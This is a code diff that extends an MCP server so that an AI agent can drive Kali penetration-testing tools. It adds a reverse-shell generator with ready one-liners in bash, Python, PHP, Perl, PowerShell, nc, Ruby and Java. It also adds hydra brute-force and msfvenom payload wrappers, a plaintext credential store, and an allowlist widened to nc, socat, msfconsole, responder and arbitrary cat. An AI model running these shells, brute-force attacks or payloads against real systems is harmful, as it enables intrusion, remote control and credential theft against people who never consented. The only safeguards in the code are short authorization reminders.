+                        "type": "string",
+                        "description": "Operation to perform",
+                        "enum": ["encode", "decode"],
+                        "default": "encode"
+                    },
+                    "format": {
+                        "type": "string",
+                        "description": "Encoding format",
+                        "enum": ["base64", "url", "hex", "html", "rot13"],
+                        "default": "base64"
+                    }
+                },
+            },
+        ),
+        types.Tool(
+            name="reverse_shell",
+            description="Generate reverse shell one-liners for various languages",
+            inputSchema={
+                "type": "object",
+                "required": ["lhost"],
+                "properties": {
+                    "lhost": {
+                        "type": "string",
+                        "description": "Listener IP address",
+                    },
+                    "shell_type": {
+                        "type": "string",
+                        "description": "Shell language/type",
+                        "enum": ["bash", "python", "php", "perl", "powershell", "nc", "ruby", "java"],
+                        "default": "bash"
+                    },
+                    "lport": {
+                        "type": "integer",
+                        "description": "Listener port",
+                        "default": 4444
+                    }
+                },
+            },
+        ),
+        types.Tool(
+            name="hash_identify",
+            description="Identify hash types from hash strings (MD5, SHA, bcrypt, NTLM, etc.)",
+            inputSchema={
+                "type": "object",
+                "required": ["hash_value"],
+                "properties": {
+                    "hash_value": {
+                        "type": "string",
+                        "description": "The hash string to identify",
+                    }
+                },
+            },
+        ),
+        types.Tool(
+            name="credential_store",
+            description="Store/retrieve discovered credentials tied to sessions",
+            inputSchema={
+                "type": "object",
+                "properties": {
+                    "action": {
+                        "type": "string",
+                        "description": "Action to perform",
+                        "enum": ["add", "list", "search"],
+                        "default": "list"
+                    },
+                    "username": {
+                        "type": "string",
+                        "description": "Username credential",
+                    },
+                    "password": {
+                        "type": "string",
+                        "description": "Password credential",
+                    },
+                    "service": {
+                        "type": "string",
+                        "description": "Service type (ssh, ftp, http, etc.)",
+                    },
+                    "target": {
+                        "type": "string",
+                        "description": "Target host/IP",
+                    },
+                    "notes": {
+                        "type": "string",
+                        "description": "Additional notes",
+                    }
+                },
+            },
+        ),
+        types.Tool(
+            name="hydra_attack",
+            description="Brute-force credential testing via hydra",
+            inputSchema={
+                "type": "object",
+                "required": ["target"],
+                "properties": {
+                    "target": {
+                        "type": "string",
+                        "description": "Target host",
+                    },
+                    "service": {
+                        "type": "string",
+                        "description": "Service to attack",
+                        "enum": ["ssh", "ftp", "http-get", "http-post-form", "smb", "mysql", "rdp", "telnet", "vnc", "pop3", "imap", "smtp"],
+                        "default": "ssh"
+                    },
+                    "username": {
+                        "type": "string",
+                        "description": "Single username to try",
+                    },
+                    "userlist": {
+                        "type": "string",
+                        "description": "Path to username wordlist",
+                    },
+                    "password": {
+                        "type": "string",
+                        "description": "Single password to try",
+                    },
+                    "passlist": {
+                        "type": "string",
+                        "description": "Path to password wordlist",
+                    },
+                    "threads": {
+                        "type": "integer",
+                        "description": "Number of threads",
+                        "default": 16
+                    },
+                    "extra_opts": {
+                        "type": "string",
+                        "description": "Additional hydra options",
+                    }
+                },
+            },
+        ),
+        types.Tool(
+            name="payload_generate",
+            description="Generate payloads using msfvenom (reverse shell, bind shell, meterpreter)",
+            inputSchema={
+                "type": "object",
+                "required": ["payload_type", "platform", "lhost"],
+                "properties": {
+                    "payload_type": {
+                        "type": "string",
+                        "description": "Type of payload",
+                        "enum": ["reverse_shell", "bind_shell", "meterpreter"],
+                    },
+                    "platform": {
+                        "type": "string",
+                        "description": "Target platform",
+                        "enum": ["linux", "windows", "osx", "php", "python"],
+                    },
+                    "lhost": {
+                        "type": "string",
+                        "description": "Listener IP address",
+                    },
+                    "lport": {
+                        "type": "integer",
+                        "description": "Listener port",
+                        "default": 4444
+                    },
+                    "format": {
+                        "type": "string",
+                        "description": "Output format",
+                        "enum": ["elf", "exe", "raw", "python", "php", "war"],
+                        "default": "raw"
+                    },
+                    "encoder": {
+                        "type": "string",
+                        "description": "Optional encoder (e.g., x86/shikata_ga_nai)",
+                    }
+                },
+            },
+        ),
+        types.Tool(
+            name="port_scan",
+            description="Smart nmap wrapper with scan presets (quick, full, stealth, udp, service, aggressive)",
+            inputSchema={
+                "type": "object",
+                "required": ["target"],
+                "properties": {
+                    "target": {
+                        "type": "string",
+                        "description": "Target IP or hostname",
+                    },
+                    "scan_type": {
+                        "type": "string",
+                        "description": "Scan preset",
+                        "enum": ["quick", "full", "stealth", "udp", "service", "aggressive"],
+                        "default": "quick"
+                    },
+                    "ports": {
+                        "type": "string",
+                        "description": "Custom port specification (e.g., '80,443,8080' or '1-1024')",
+                    }
+                },
+            },
+        ),
+        types.Tool(
+            name="dns_enum",
+            description="Comprehensive DNS enumeration with zone transfer attempts",
+            inputSchema={
+                "type": "object",
+                "required": ["domain"],
+                "properties": {
+                    "domain": {
+                        "type": "string",
+                        "description": "Target domain to enumerate",
+                    },
+                    "record_types": {
+                        "type": "string",
+                        "description": "Record types to query (all, or comma-separated: a,mx,ns,txt,etc.)",
+                        "default": "all"
+                    }
+                },
+            },
+        ),
+        types.Tool(
+            name="enum_shares",
+            description="SMB/NFS share enumeration (smbclient, enum4linux, showmount)",
+            inputSchema={
+                "type": "object",
+                "required": ["target"],
+                "properties": {
+                    "target": {
+                        "type": "string",
+                        "description": "Target host",
+                    },
+                    "enum_type": {
+                        "type": "string",
+                        "description": "Enumeration type",
+                        "enum": ["smb", "nfs", "all"],
+                        "default": "all"
+                    },
+                    "username": {
+                        "type": "string",
+                        "description": "Optional SMB username",
+                    },
+                    "password": {
+                        "type": "string",
+                        "description": "Optional SMB password",
+                    }
+                },
+            },
+        ),
+        types.Tool(
+            name="parse_nmap",
+            description="Parse nmap output (text or XML) into structured findings",
+            inputSchema={
+                "type": "object",
+                "required": ["filepath"],
+                "properties": {
+                    "filepath": {
+                        "type": "string",
+                        "description": "Path to nmap output file",
+                    }
+                },
+            },
+        ),
+        types.Tool(
+            name="parse_tool_output",
+            description="Parse output from nikto/gobuster/dirb/hydra/sqlmap into structured findings",
+            inputSchema={
+                "type": "object",
+                "required": ["filepath"],
+                "properties": {
+                    "filepath": {
+                        "type": "string",
+                        "description": "Path to tool output file",
+                    },
+                    "tool_type": {
+                        "type": "string",
+                        "description": "Tool that generated the output (auto-detects if not specified)",
+                        "enum": ["auto", "nikto", "gobuster", "dirb", "hydra", "sqlmap"],
+                        "default": "auto"
+                    }
+                },
+            },
+        ),
+        types.Tool(
+            name="recon_auto",
+            description="Automated multi-stage reconnaissance pipeline (DNS, ports, headers, SSL, exploits)",
+            inputSchema={
+                "type": "object",
+                "required": ["target"],
+                "properties": {
+                    "target": {
+                        "type": "string",
+                        "description": "Target domain or IP",
+                    },
+                    "depth": {
+                        "type": "string",
+                        "description": "Recon depth (quick=DNS+ports+headers, standard=+SSL+exploits, deep=+subdomains+web+vulns)",
+                        "enum": ["quick", "standard", "deep"],
+                        "default": "quick"
                     }
                 },
             },

--- a/kali_mcp_server/tools.py
+++ b/kali_mcp_server/tools.py
@@ -8,18 +8,26 @@ This module contains the implementations of the tools exposed by the MCP server:
 """
 
 import asyncio
+import base64
+import codecs
+import datetime
+import html as html_module
 import json
+import os
 import platform
 import re
+import shlex
+import urllib.parse
+import xml.etree.ElementTree as ET
 from typing import Sequence, Union, Optional
-import os
-import datetime
 
 import httpx
 import mcp.types as types
 
 # List of allowed commands for security purposes
 # Format: (command_prefix, is_long_running)
+# Since this runs inside an isolated Docker container, commands are
+# allowed broadly. The container itself is the security boundary.
 ALLOWED_COMMANDS = [
     # System information
     ("uname", False),
@@ -30,10 +38,14 @@ ALLOWED_COMMANDS = [
     ("free", False),
     ("df", False),
     ("ps", False),
-    ("top -n 1", False),
-    
+    ("top", False),
+    ("env", False),
+    ("hostname", False),
+    ("arch", False),
+    ("lsb_release", False),
+
     # Network utilities
-    ("ping -c", False),  # Allow ping with count parameter
+    ("ping", False),
     ("ifconfig", False),
     ("ip", False),
     ("netstat", False),
@@ -43,61 +55,136 @@ ALLOWED_COMMANDS = [
     ("host", False),
     ("curl", False),
     ("wget", False),
-    
-    # Security tools
-    ("nmap", True),  # Long-running
-    ("nikto", True),  # Long-running
-    ("gobuster", True),  # Long-running
-    ("dirb", True),  # Long-running
-    ("whois", False),
-    ("sqlmap", True),  # Long-running
-    ("searchsploit", False),
     ("traceroute", False),
-    ("testssl.sh", True),  # Long-running
-    ("amass", True),  # Long-running
-    ("httpx", True),  # Long-running
-    ("subfinder", True),  # Long-running
+    ("arp", False),
+    ("route", False),
+    ("nc", False),
+    ("ncat", False),
+    ("socat", True),
+
+    # Security / pentesting tools
+    ("nmap", True),
+    ("nikto", True),
+    ("gobuster", True),
+    ("dirb", True),
+    ("whois", False),
+    ("sqlmap", True),
+    ("searchsploit", False),
+    ("testssl.sh", True),
+    ("amass", True),
+    ("httpx", True),
+    ("subfinder", True),
     ("waybackurls", False),
-    ("gospider", True),  # Long-running
-    
+    ("gospider", True),
+    ("hydra", True),
+    ("msfvenom", True),
+    ("msfconsole", True),
+    ("msfdb", False),
+    ("smbclient", False),
+    ("smbmap", True),
+    ("enum4linux", True),
+    ("showmount", False),
+    ("hashid", False),
+    ("hashcat", True),
+    ("john", True),
+    ("wpscan", True),
+    ("masscan", True),
+    ("responder", True),
+    ("crackmapexec", True),
+    ("cme", True),
+    ("impacket-", True),
+    ("evil-winrm", True),
+    ("wfuzz", True),
+    ("ffuf", True),
+    ("feroxbuster", True),
+    ("whatweb", False),
+    ("wafw00f", False),
+    ("dnsenum", True),
+    ("dnsrecon", True),
+    ("fierce", True),
+    ("theharvester", True),
+    ("recon-ng", True),
+    ("maltego", True),
+    ("netdiscover", True),
+    ("arpspoof", True),
+    ("ettercap", True),
+    ("bettercap", True),
+    ("aircrack-ng", True),
+    ("airodump-ng", True),
+    ("aireplay-ng", True),
+    ("tcpdump", True),
+    ("tshark", True),
+    ("wireshark", True),
+
     # File analysis tools
     ("file", False),
     ("strings", False),
     ("sha256sum", False),
+    ("sha1sum", False),
     ("md5sum", False),
     ("wc", False),
-    
-    # File operations
+    ("xxd", False),
+    ("hexdump", False),
+    ("binwalk", False),
+    ("exiftool", False),
+    ("objdump", False),
+    ("readelf", False),
+    ("strace", True),
+    ("ltrace", True),
+
+    # File operations — cat is broadly allowed inside the container
     ("ls", False),
-    # Only allow cat on safe files
-    ("cat /proc/", False),
-    ("cat /var/log/", False),
-    ("cat command_output.txt", False),
-    ("cat *.txt", False),
-    ("cat *.log", False),
-    ("cat vuln_scan_", False),
-    ("cat web_enum_", False),
-    ("cat network_discovery_", False),
-    ("cat exploit_search_", False),
-    ("cat file_analysis_", False),
-    ("cat report_", False),
-    ("cat downloads/", False),
-    ("cat spider_", False),
-    ("cat form_analysis_", False),
-    ("cat header_analysis_", False),
-    ("cat ssl_analysis_", False),
-    ("cat subdomain_enum_", False),
-    ("cat web_audit_", False),
+    ("cat", False),
     ("head", False),
     ("tail", False),
-    ("find", True),  # Can be long-running
+    ("less", False),
+    ("more", False),
+    ("find", True),
     ("grep", False),
-    
+    ("awk", False),
+    ("sed", False),
+    ("sort", False),
+    ("uniq", False),
+    ("cut", False),
+    ("tr", False),
+    ("diff", False),
+    ("tee", False),
+    ("xargs", False),
+    ("mkdir", False),
+    ("cp", False),
+    ("mv", False),
+    ("touch", False),
+    ("chmod", False),
+    ("chown", False),
+
     # Utility commands
     ("echo", False),
+    ("printf", False),
     ("which", False),
+    ("whereis", False),
     ("man", False),
     ("help", False),
+    ("history", False),
+    ("alias", False),
+    ("export", False),
+    ("base64", False),
+    ("openssl", False),
+    ("ssh-keygen", False),
+    ("python", False),
+    ("python3", False),
+    ("perl", False),
+    ("ruby", False),
+    ("php", False),
+    ("java", False),
+    ("gcc", False),
+    ("g++", False),
+    ("make", False),
+    ("git", False),
+    ("tar", False),
+    ("gzip", False),
+    ("gunzip", False),
+    ("zip", False),
+    ("unzip", False),
 ]
 
 # --- Session Management Backend ---
@@ -1640,6 +1727,944 @@ async def web_audit(url: str, audit_type: str = "comprehensive") -> Sequence[typ
     except Exception as e:
         return [types.TextContent(type="text", text=f"❌ Error during web audit: {str(e)}")]
 
+# --- Phase 1: Pure Python Tools ---
+
+
+async def encode_decode(data: str, operation: str = "encode", format: str = "base64") -> Sequence[types.TextContent]:
+    """
+    Multi-format encoding/decoding utility.
+
+    Args:
+        data: The data to encode or decode
+        operation: 'encode' or 'decode'
+        format: Encoding format (base64, url, hex, html, rot13)
+
+    Returns:
+        List containing TextContent with the result
+    """
+    try:
+        if format == "base64":
+            if operation == "encode":
+                result = base64.b64encode(data.encode()).decode()
+            else:
+                result = base64.b64decode(data.encode()).decode()
+        elif format == "url":
+            if operation == "encode":
+                result = urllib.parse.quote(data, safe="")
+            else:
+                result = urllib.parse.unquote(data)
+        elif format == "hex":
+            if operation == "encode":
+                result = data.encode().hex()
+            else:
+                result = bytes.fromhex(data).decode()
+        elif format == "html":
+            if operation == "encode":
+                result = html_module.escape(data)
+            else:
+                result = html_module.unescape(data)
+        elif format == "rot13":
+            result = codecs.encode(data, "rot_13")
+        else:
+            return [types.TextContent(type="text", text=f"Unsupported format: {format}. Supported: base64, url, hex, html, rot13")]
+
+        return [types.TextContent(type="text", text=
+            f"Result ({operation} {format}):\n\n"
+            f"Input:  {data}\n"
+            f"Output: {result}"
+        )]
+    except Exception as e:
+        return [types.TextContent(type="text", text=f"Error during {operation} ({format}): {str(e)}")]
+
+
+REVERSE_SHELL_TEMPLATES = {
+    "bash": "bash -i >& /dev/tcp/{lhost}/{lport} 0>&1",
+    "python": "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{lhost}\",{lport}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'",
+    "php": "php -r '$sock=fsockopen(\"{lhost}\",{lport});exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
+    "perl": "perl -e 'use Socket;$i=\"{lhost}\";$p={lport};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");}};'",
+    "powershell": "$client = New-Object System.Net.Sockets.TCPClient('{lhost}',{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()",
+    "nc": "nc -e /bin/sh {lhost} {lport}",
+    "ruby": "ruby -rsocket -e'f=TCPSocket.open(\"{lhost}\",{lport}).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'",
+    "java": "Runtime r = Runtime.getRuntime();Process p = r.exec(new String[]{{\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/{lhost}/{lport};cat <&5 | while read line; do $line 2>&5 >&5; done\"}});p.waitFor();",
+}
+
+
+async def reverse_shell(lhost: str, shell_type: str = "bash", lport: int = 4444) -> Sequence[types.TextContent]:
+    """
+    Generate reverse shell one-liners for various languages.
+
+    Args:
+        lhost: Listener IP address
+        shell_type: Shell type (bash, python, php, perl, powershell, nc, ruby, java)
+        lport: Listener port (default: 4444)
+
+    Returns:
+        List containing TextContent with the generated command
+    """
+    if shell_type not in REVERSE_SHELL_TEMPLATES:
+        available = ", ".join(REVERSE_SHELL_TEMPLATES.keys())
+        return [types.TextContent(type="text", text=f"Unsupported shell type: {shell_type}. Available: {available}")]
+
+    template = REVERSE_SHELL_TEMPLATES[shell_type]
+    command = template.format(lhost=lhost, lport=lport)
+
+    listener_hint = f"nc -lvnp {lport}"
+
+    return [types.TextContent(type="text", text=
+        f"Reverse Shell ({shell_type})\n"
+        f"{'=' * 40}\n\n"
+        f"LHOST: {lhost}\n"
+        f"LPORT: {lport}\n\n"
+        f"Payload:\n{command}\n\n"
+        f"Listener command:\n{listener_hint}\n\n"
+        f"Note: Ensure you have proper authorization before using this payload."
+    )]
+
+
+HASH_PATTERNS = [
+    (r"^[a-fA-F0-9]{32}$", "MD5", "0", "raw-md5"),
+    (r"^[a-fA-F0-9]{40}$", "SHA-1", "100", "raw-sha1"),
+    (r"^[a-fA-F0-9]{64}$", "SHA-256", "1400", "raw-sha256"),
+    (r"^[a-fA-F0-9]{128}$", "SHA-512", "1700", "raw-sha512"),
+    (r"^\$2[aby]?\$\d{1,2}\$.{53}$", "bcrypt", "3200", "bcrypt"),
+    (r"^\$6\$.+\$.{86}$", "SHA-512 Crypt", "1800", "sha512crypt"),
+    (r"^\$5\$.+\$.{43}$", "SHA-256 Crypt", "7400", "sha256crypt"),
+    (r"^\$1\$.+\$.{22}$", "MD5 Crypt", "500", "md5crypt"),
+    (r"^[a-fA-F0-9]{32}:[a-fA-F0-9]{32}$", "NTLM (LM:NT)", "1000", "nt"),
+    (r"^\$apr1\$.+\$.{22}$", "Apache APR1", "1600", ""),
+    (r"^[a-fA-F0-9]{16}$", "MySQL 3.x / Half MD5", "200", "mysql"),
+    (r"^\*[a-fA-F0-9]{40}$", "MySQL 4.1+", "300", "mysql-sha1"),
+    (r"^sha1\$[a-zA-Z0-9]+\$[a-fA-F0-9]{40}$", "Django SHA-1", "124", ""),
+    (r"^pbkdf2_sha256\$.+", "Django PBKDF2-SHA256", "10000", ""),
+]
+
+
+async def hash_identify(hash_value: str) -> Sequence[types.TextContent]:
+    """
+    Identify hash types from hash strings.
+
+    Args:
+        hash_value: The hash string to identify
+
+    Returns:
+        List containing TextContent with identified hash types
+    """
+    hash_value = hash_value.strip()
+    matches = []
+
+    for pattern, name, hashcat_mode, john_format in HASH_PATTERNS:
+        if re.match(pattern, hash_value):
+            entry = f"- **{name}**"
+            if hashcat_mode:
+                entry += f" | Hashcat mode: {hashcat_mode}"
+            if john_format:
+                entry += f" | John format: {john_format}"
+            matches.append(entry)
+
+    # Try hashid binary if available
+    hashid_output = ""
+    try:
+        process = await asyncio.create_subprocess_exec(
+            "hashid", hash_value,
+            stdout=asyncio.subprocess.PIPE,
+            stderr=asyncio.subprocess.PIPE
+        )
+        stdout, _ = await asyncio.wait_for(process.communicate(), timeout=10.0)
+        hashid_output = stdout.decode().strip()
+    except Exception:
+        pass
+
+    output = f"Hash Identification\n{'=' * 40}\n\n"
+    output += f"Input: {hash_value}\n"
+    output += f"Length: {len(hash_value)} characters\n\n"
+
+    if matches:
+        output += "Possible hash types (regex matching):\n"
+        output += "\n".join(matches)
+    else:
+        output += "No hash type identified by regex matching."
+
+    if hashid_output:
+        output += f"\n\nhashid output:\n{hashid_output}"
+
+    return [types.TextContent(type="text", text=output)]
+
+
+async def credential_store(
+    action: str = "list",
+    username: Optional[str] = None,
+    password: Optional[str] = None,
+    service: Optional[str] = None,
+    target: Optional[str] = None,
+    notes: Optional[str] = None,
+) -> Sequence[types.TextContent]:
+    """
+    Store/retrieve discovered credentials tied to sessions.
+
+    Args:
+        action: Action to perform (add, list, search)
+        username: Username credential
+        password: Password credential
+        service: Service type (ssh, ftp, http, etc.)
+        target: Target host/IP
+        notes: Additional notes
+
+    Returns:
+        List containing TextContent with credential operation result
+    """
+    # Determine credentials file location
+    active_session = load_active_session()
+    if active_session:
+        creds_dir = get_session_path(active_session)
+        os.makedirs(creds_dir, exist_ok=True)
+        creds_file = os.path.join(creds_dir, "credentials.json")
+    else:
+        creds_file = "credentials.json"
+
+    # Load existing credentials
+    creds = []
+    if os.path.exists(creds_file):
+        try:
+            with open(creds_file, "r") as f:
+                creds = json.load(f)
+        except (json.JSONDecodeError, IOError):
+            creds = []
+
+    if action == "add":
+        if not username:
+            return [types.TextContent(type="text", text="Error: 'username' is required to add a credential.")]
+        entry = {
+            "username": username,
+            "password": password or "",
+            "service": service or "",
+            "target": target or "",
+            "notes": notes or "",
+            "timestamp": datetime.datetime.now().isoformat(),
+        }
+        creds.append(entry)
+        with open(creds_file, "w") as f:
+            json.dump(creds, f, indent=2)
+        return [types.TextContent(type="text", text=
+            f"Credential added successfully.\n\n"
+            f"Username: {username}\n"
+            f"Service: {service or 'N/A'}\n"
+            f"Target: {target or 'N/A'}\n"
+            f"Stored in: {creds_file}\n\n"
+            f"Warning: Credentials are stored in plaintext."
+        )]
+
+    elif action == "list":
+        if not creds:
+            return [types.TextContent(type="text", text=f"No credentials stored in {creds_file}.")]
+        output = f"Stored Credentials ({len(creds)} entries)\n{'=' * 40}\n\n"
+        for i, c in enumerate(creds, 1):
+            output += f"{i}. {c.get('username', 'N/A')}:{c.get('password', 'N/A')}"
+            output += f" @ {c.get('service', 'N/A')}"
+            if c.get("target"):
+                output += f" ({c['target']})"
+            if c.get("notes"):
+                output += f" - {c['notes']}"
+            output += "\n"
+        output += f"\nFile: {creds_file}"
+        return [types.TextContent(type="text", text=output)]
+
+    elif action == "search":
+        search_term = username or service or target or ""
+        if not search_term:
+            return [types.TextContent(type="text", text="Error: Provide username, service, or target to search.")]
+        results = [
+            c for c in creds
+            if search_term.lower() in json.dumps(c).lower()
+        ]
+        if not results:
+            return [types.TextContent(type="text", text=f"No credentials found matching '{search_term}'.")]
+        output = f"Search Results for '{search_term}' ({len(results)} matches)\n{'=' * 40}\n\n"
+        for i, c in enumerate(results, 1):
+            output += f"{i}. {c.get('username', 'N/A')}:{c.get('password', 'N/A')}"
+            output += f" @ {c.get('service', 'N/A')}"
+            if c.get("target"):
+                output += f" ({c['target']})"
+            output += "\n"
+        return [types.TextContent(type="text", text=output)]
+
+    else:
+        return [types.TextContent(type="text", text=f"Unknown action: {action}. Use 'add', 'list', or 'search'.")]
+
+
+# --- Phase 2: Subprocess Wrapper Tools ---
+
+
+async def hydra_attack(
+    target: str,
+    service: str = "ssh",
+    username: Optional[str] = None,
+    userlist: Optional[str] = None,
+    password: Optional[str] = None,
+    passlist: Optional[str] = None,
+    threads: int = 16,
+    extra_opts: str = "",
+) -> Sequence[types.TextContent]:
+    """
+    Brute-force credential testing via hydra.
+
+    Args:
+        target: Target host
+        service: Service to attack (ssh, ftp, http-get, smb, mysql, rdp, etc.)
+        username: Single username
+        userlist: Path to username wordlist
+        password: Single password
+        passlist: Path to password wordlist
+        threads: Number of threads (default: 16)
+        extra_opts: Additional hydra options
+
+    Returns:
+        List containing TextContent with attack status
+    """
+    # Validate credential sources
+    if not username and not userlist:
+        return [types.TextContent(type="text", text="Error: Provide either 'username' or 'userlist'.")]
+    if not password and not passlist:
+        return [types.TextContent(type="text", text="Error: Provide either 'password' or 'passlist'.")]
+
+    timestamp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
+    safe_target = re.sub(r'[^a-zA-Z0-9._-]', '_', target)
+    output_file = f"hydra_{safe_target}_{service}_{timestamp}.txt"
+
+    cmd_parts = ["hydra"]
+    if username:
+        cmd_parts.extend(["-l", shlex.quote(username)])
+    elif userlist:
+        cmd_parts.extend(["-L", shlex.quote(userlist)])
+    if password:
+        cmd_parts.extend(["-p", shlex.quote(password)])
+    elif passlist:
+        cmd_parts.extend(["-P", shlex.quote(passlist)])
+    cmd_parts.extend(["-t", str(threads)])
+    cmd_parts.extend(["-o", output_file])
+    if extra_opts:
+        cmd_parts.append(re.sub(r'[;&|]', '', extra_opts))
+    cmd_parts.append(shlex.quote(target))
+    cmd_parts.append(service)
+
+    command = " ".join(cmd_parts)
+
+    await asyncio.create_subprocess_shell(
+        f"{command} > {output_file} 2>&1 &",
+        stdout=asyncio.subprocess.PIPE,
+        stderr=asyncio.subprocess.PIPE,
+    )
+
+    return [types.TextContent(type="text", text=
+        f"Hydra attack launched.\n\n"
+        f"Target: {target}\n"
+        f"Service: {service}\n"
+        f"Threads: {threads}\n"
+        f"Command: {command}\n"
+        f"Output: {output_file}\n\n"
+        f"Check progress: cat {output_file}\n"
+        f"Note: Ensure you have proper authorization."
+    )]
+
+
+MSFVENOM_PAYLOADS = {
+    ("reverse_shell", "linux"): "linux/x86/shell_reverse_tcp",
+    ("reverse_shell", "windows"): "windows/shell_reverse_tcp",
+    ("reverse_shell", "osx"): "osx/x86/shell_reverse_tcp",
+    ("reverse_shell", "php"): "php/reverse_php",
+    ("reverse_shell", "python"): "cmd/unix/reverse_python",
+    ("bind_shell", "linux"): "linux/x86/shell_bind_tcp",
+    ("bind_shell", "windows"): "windows/shell_bind_tcp",
+    ("meterpreter", "linux"): "linux/x86/meterpreter/reverse_tcp",
+    ("meterpreter", "windows"): "windows/meterpreter/reverse_tcp",
+    ("meterpreter", "osx"): "osx/x86/meterpreter/reverse_tcp",
+}
+
+
+async def payload_generate(
+    payload_type: str,
+    platform: str,
+    lhost: str,
+    lport: int = 4444,
+    format: str = "raw",
+    encoder: Optional[str] = None,
+) -> Sequence[types.TextContent]:
+    """
+    Generate payloads using msfvenom.
+
+    Args:
+        payload_type: Type of payload (reverse_shell, bind_shell, meterpreter)
+        platform: Target platform (linux, windows, osx, php, python)
+        lhost: Listener IP address
+        lport: Listener port (default: 4444)
+        format: Output format (elf, exe, raw, python, php, war)
+        encoder: Optional encoder (e.g., x86/shikata_ga_nai)
+
+    Returns:
+        List containing TextContent with generation status
+    """
+    payload_key = (payload_type, platform)
+    payload_str = MSFVENOM_PAYLOADS.get(payload_key)
+    if not payload_str:
+        available = ", ".join(f"{t}/{p}" for t, p in MSFVENOM_PAYLOADS)
+        return [types.TextContent(type="text", text=f"Unsupported payload_type/platform: {payload_type}/{platform}. Available: {available}")]
+
+    timestamp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
+    ext_map = {"elf": "elf", "exe": "exe", "raw": "bin", "python": "py", "php": "php", "war": "war"}
+    ext = ext_map.get(format, "bin")
+    output_file = f"payload_{payload_type}_{platform}_{timestamp}.{ext}"
+
+    cmd_parts = [
+        "msfvenom",
+        "-p", payload_str,
+        f"LHOST={shlex.quote(lhost)}",
+        f"LPORT={lport}",
+        "-f", format,
+        "-o", output_file,
+    ]
+    if encoder:
+        cmd_parts.extend(["-e", shlex.quote(encoder)])
+
+    command = " ".join(cmd_parts)
+
+    process = await asyncio.create_subprocess_shell(
+        f"{command} 2>&1",
+        stdout=asyncio.subprocess.PIPE,
+        stderr=asyncio.subprocess.PIPE,
+    )
+    stdout, _ = await asyncio.wait_for(process.communicate(), timeout=120.0)
+    cmd_output = stdout.decode() if stdout else ""
+
+    return [types.TextContent(type="text", text=
+        f"msfvenom payload generation complete.\n\n"
+        f"Payload: {payload_str}\n"
+        f"LHOST: {lhost}\n"
+        f"LPORT: {lport}\n"
+        f"Format: {format}\n"
+        f"Output file: {output_file}\n\n"
+        f"Command: {command}\n"
+        f"Output:\n{cmd_output[:500]}\n\n"
+        f"Note: Ensure you have proper authorization."
+    )]
+
+
+SCAN_PRESETS = {
+    "quick": "-F -sV",
+    "full": "-sS -sV -p-",
+    "stealth": "-sS -T2 --max-retries 1",
+    "udp": "-sU --top-ports 100",
+    "service": "-sV --version-intensity 5 -sC",
+    "aggressive": "-A -T4",
+}
+
+
+async def port_scan(
+    target: str,
+    scan_type: str = "quick",
+    ports: Optional[str] = None,
+) -> Sequence[types.TextContent]:
+    """
+    Smart nmap wrapper with scan presets.
+
+    Args:
+        target: Target IP/hostname
+        scan_type: Scan preset (quick, full, stealth, udp, service, aggressive)
+        ports: Custom port specification (overrides preset)
+
+    Returns:
+        List containing TextContent with scan status
+    """
+    if scan_type not in SCAN_PRESETS:
+        available = ", ".join(SCAN_PRESETS.keys())
+        return [types.TextContent(type="text", text=f"Unknown scan_type: {scan_type}. Available: {available}")]
+
+    timestamp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
+    safe_target = re.sub(r'[^a-zA-Z0-9._-]', '_', target)
+    output_txt = f"port_scan_{safe_target}_{scan_type}_{timestamp}.txt"
+    output_xml = f"port_scan_{safe_target}_{scan_type}_{timestamp}.xml"
+
+    flags = SCAN_PRESETS[scan_type]
+    if ports:
+        flags = re.sub(r'-p[\S]*', '', flags).strip()
+        flags += f" -p {ports}"
+
+    command = f"nmap {flags} -oN {output_txt} -oX {output_xml} {shlex.quote(target)}"
+
+    await asyncio.create_subprocess_shell(
+        f"{command} > /dev/null 2>&1 &",
+        stdout=asyncio.subprocess.PIPE,
+        stderr=asyncio.subprocess.PIPE,
+    )
+
+    return [types.TextContent(type="text", text=
+        f"port_scan ({scan_type}) launched.\n\n"
+        f"Target: {target}\n"
+        f"Flags: {flags}\n"
+        f"Command: {command}\n"
+        f"Text output: {output_txt}\n"
+        f"XML output: {output_xml}\n\n"
+        f"Check progress: cat {output_txt}"
+    )]
+
+
+async def dns_enum(
+    domain: str,
+    record_types: str = "all",
+) -> Sequence[types.TextContent]:
+    """
+    Comprehensive DNS enumeration.
+
+    Args:
+        domain: Target domain
+        record_types: Record types to query (all, a, aaaa, mx, ns, txt, cname, soa, srv)
+
+    Returns:
+        List containing TextContent with DNS enumeration results
+    """
+    timestamp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
+    safe_domain = re.sub(r'[^a-zA-Z0-9._-]', '_', domain)
+    output_file = f"dns_enum_{safe_domain}_{timestamp}.txt"
+
+    if record_types == "all":
+        types_list = ["A", "AAAA", "MX", "NS", "TXT", "CNAME", "SOA", "SRV"]
+    else:
+        types_list = [t.strip().upper() for t in record_types.split(",")]
+
+    results = []
+    for rtype in types_list:
+        try:
+            process = await asyncio.create_subprocess_exec(
+                "dig", "+noall", "+answer", domain, rtype,
+                stdout=asyncio.subprocess.PIPE,
+                stderr=asyncio.subprocess.PIPE,
+            )
+            stdout, _ = await asyncio.wait_for(process.communicate(), timeout=15.0)
+            output = stdout.decode().strip()
+            results.append(f"--- {rtype} Records ---\n{output if output else 'No records found.'}\n")
